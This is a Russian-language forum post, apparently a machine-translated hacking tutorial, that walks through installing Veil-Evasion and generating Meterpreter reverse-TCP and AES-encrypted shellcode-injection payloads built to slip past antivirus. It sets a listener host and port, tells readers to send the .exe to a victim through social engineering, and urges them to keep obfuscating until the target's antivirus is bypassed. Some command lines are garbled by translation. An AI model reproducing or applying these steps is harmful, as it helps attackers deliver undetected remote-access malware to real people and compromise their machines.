Уклонение от AV с помощью Veil-Evasion

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$
Одна из важнейших задач, которую должен решить любой хакер, — как обойти устройства безопасности и остаться незамеченным. К ним относятся антивирусное ПО, системы обнаружения вторжений, межсетевые экраны, межсетевые экраны веб-приложений и многое другое. Поскольку практически все эти устройства используют схему обнаружения на основе сигнатур, ведущую базу данных известных эксплойтов и сигнатур полезной нагрузки, ключ к успеху заключается в следующем:

  1. создайте свой собственный эксплойт, или
  2. изменить сигнатуру известного эксплойта или полезной нагрузки.
Поскольку создание собственного эксплойта и полезной нагрузки требует много времени и продвинутых навыков, начинающему хакеру лучше сначала попытаться изменить сигнатуру эксплойта и полезной нагрузки.

В предыдущих руководствах мы использовали как msfpayload/msencode от Metasploit (теперь устарел), так и msfvenom. В этих случаях разработчики антивируса кодировали сигнатуру для шаблонов, используемых этими схемами. В этом руководстве мы рассмотрим другую схему перекодирования для сокрытия сигнатуры известных полезных нагрузок, известную как Veil-Evasion.

Veil-Evasion был специально разработан для изменения сигнатуры вашей полезной нагрузки. Он написан на Python, но имеет множество кодировщиков, позволяющих переписывать код различными способами, чтобы избежать обнаружения.

Шаг 1: Установка Veil-Evasion​

Сначала нам нужно установить Veil-Evasion на нашу систему. Его можно скачать из репозитория Kali. Просто введите:

kali > apt-get install veil-evasion

Шаг 2: Настройка уклонения от завесы​

Чтобы запустить Veil-Evasion, просто введите:

кали > уклонение от завесы

После этого вы увидите следующий начальный экран:

6a4a49_e76436e8435d47bfb681b638efe7e2ed~mv2.jpg


Veil начнёт установку. Система спросит, хотите ли вы установить зависимости; ответьте «y» в качестве подтверждения.

6a4a49_d587dda5089943cf8ff740acf16c488c~mv2.jpg


Далее Veil-Evasion начнёт загрузку всех своих зависимостей. Это может занять некоторое время, поэтому наберитесь терпения. В конце концов, Veil-Evasion спросит вас, хотите ли вы установить Python для Windows. Выберите «Установить для всех пользователей» и нажмите кнопку «Далее».

Мастер установки предложит вам выбрать каталог по умолчанию. После этого появится экран, как показано ниже. Нажмите «Далее».

6a4a49_8cc0fd40105f4b128e5cfaf478c62f7f~mv2.jpg


В конце концов вы увидите экран, подобный показанному ниже. Нажмите «Далее» ещё раз.

6a4a49_d2e85c5f1e1e4e9ab5bc474d206a99b8~mv2.jpg


Продолжайте нажимать кнопку «Далее» на протяжении нескольких экранов, пока не доберётесь до окна с кнопкой «Готово». Нажмите её. В конце концов, ваше терпение будет вознаграждено, когда вы наконец доберётесь до экрана ниже.

6a4a49_ad0859b4cd364b4282a3d431b5a61a86~mv2.jpg


Теперь мы готовы начать использовать Veil-Evasion для создания практически необнаружимой полезной нагрузки.

Шаг 3: Создайте EXE-файл с полезной нагрузкой​

На первом этапе мы создадим простой исполняемый файл (.exe), содержащий полезную нагрузку, позволяющую нам получить доступ к системе жертвы. Этот файл можно отправить жертве, чтобы она могла выполнить его, нажав на него. Как правило, подобные атаки являются частью атак социальной инженерии.

Давайте теперь введем «list», так как это выведет список всех полезных нагрузок, с которыми может работать Veil-Evasion.

6a4a49_d451d8e330cc43f3bf5c435c53628065~mv2.jpg


Те из вас, кто знаком с Metasploit, узнают многие из этих полезных нагрузок.

Шаг 4: Использование полезной нагрузки​

В этом случае давайте используем ruby/meterpreter/rev_tcp или число 44. Давайте наберем:

> использовать 44

Когда мы это сделаем, Veil-Evasion выведет на экран, как показано ниже, предлагая нам установить параметры.

6a4a49_140bd357fc2e43588fad82f504f16109~mv2.jpg


Нам потребуется настроить LHOST и LPORT.

> установить LHOST 192.168.1.101

> установить LPORT 6996

Конечно, используйте соответствующий вашим обстоятельствам IP-адрес и порт.

Далее нам нужно указать Veil-Evasion сгенерировать исполняемый файл.

> генерировать

6a4a49_df71924b7be642a39d9754548cbbaf25~mv2.jpg


Как вы можете видеть на снимке экрана выше, Veil-Evasion сгенерировал новый .exe-файл, который я назвал «newpayload.exe» (вы можете назвать его как угодно).

Шаг 5: Создайте зашифрованную полезную нагрузку, чтобы избежать обнаружения​

Далее попробуем создать зашифрованную полезную нагрузку, которую можно будет пропустить через антивирусное ПО и другие устройства безопасности. В данном случае мы будем использовать другую полезную нагрузку из списка, а именно python/shellcode_inject/aes_encrypt. Этот тип полезной нагрузки использует внедрение VirtualAlloc, которое создаёт исполняемую область в памяти для шелл-кода, а затем блокирует эту область памяти в физической памяти.

Это номер 32 в нашем списке полезной нагрузки, поэтому введите:

> информация 32

Затем он возвращает информацию об этой полезной нагрузке, как показано ниже.

6a4a49_322b53b67d13488fa3a06a19c5d43081~mv2.jpg


Эта полезная нагрузка использует инъекцию VirtualAlloc в сочетании с шифрованием AES (AES — это усовершенствованный стандарт шифрования, который обычно считается одним из самых стойких из существующих) для сокрытия своей истинной природы от антивирусного программного обеспечения и других устройств безопасности.

Далее сообщим Veil-Evasion, что мы хотим использовать эту полезную нагрузку.

> использовать 32

6a4a49_9e3fcb7e7dd9405898ae0744fa021e1d~mv2.jpg


Здесь у нас есть возможность изменить параметры по умолчанию, если это необходимо. Пока оставим параметры по умолчанию без изменений.

Далее сообщим Veil-Evasion, что мы хотим сгенерировать эту зашифрованную полезную нагрузку.

> генерировать

6a4a49_642c54a17bbf404d966758d11cc4cf9d~mv2.jpg


При этом он будет использовать полезную нагрузку по умолчанию windows/meterpreter/reverse_tcp, а затем запросит LHOST и LPORT. После того, как мы завершим ввод необходимой информации для нашей полезной нагрузки, он начнёт генерировать шелл-код. Это может занять несколько минут, так что наберитесь терпения.

Далее Veil-Evasion предложит нам выбрать название для нашей полезной нагрузки. Вы можете использовать любое имя, какое душе угодно, но я использовал простое «veilpayload».

6a4a49_85e84c1f8c44435daed1882a8b791cd1~mv2.jpg


Наконец, Veil-Evasion завершит свою работу и
представит нам готовый продукт, как мы видим ниже.

6a4a49_899b112407ad4f71a17b795b4be0a487~mv2.jpg


Этот новый код со встроенным meterpreter обойдет большинство антивирусных программ и устройств безопасности. Как и в случае с любым другим антивирусом, разработчики антивируса, вероятно, найдут способ обнаружить даже эту полезную нагрузку, поэтому проявите изобретательность и попробуйте другие методы обфускации полезной нагрузки в Veil-Evasion, пока не найдете тот, который скроет вашу полезную нагрузку.

Обход защитного ПО и устройств — одна из важнейших задач хакера, и Veil-Evasion — ещё один инструмент в нашем арсенале. Однако помните, что НИКОГДА не существует единственно верного решения. Хакер должен быть настойчивым и изобретательным в поиске способов обхода этих устройств, поэтому, если один метод не срабатывает, попробуйте другой, затем ещё один, пока не найдёте работающий. Кроме того, вам нужно обойти только антивирус цели, а не все антивирусы. Возможно, вы сможете определить антивирус цели с помощью recon-ng, а затем разработать полезную нагрузку, которая обойдёт этот антивирус.
 
Назад
Сверху Снизу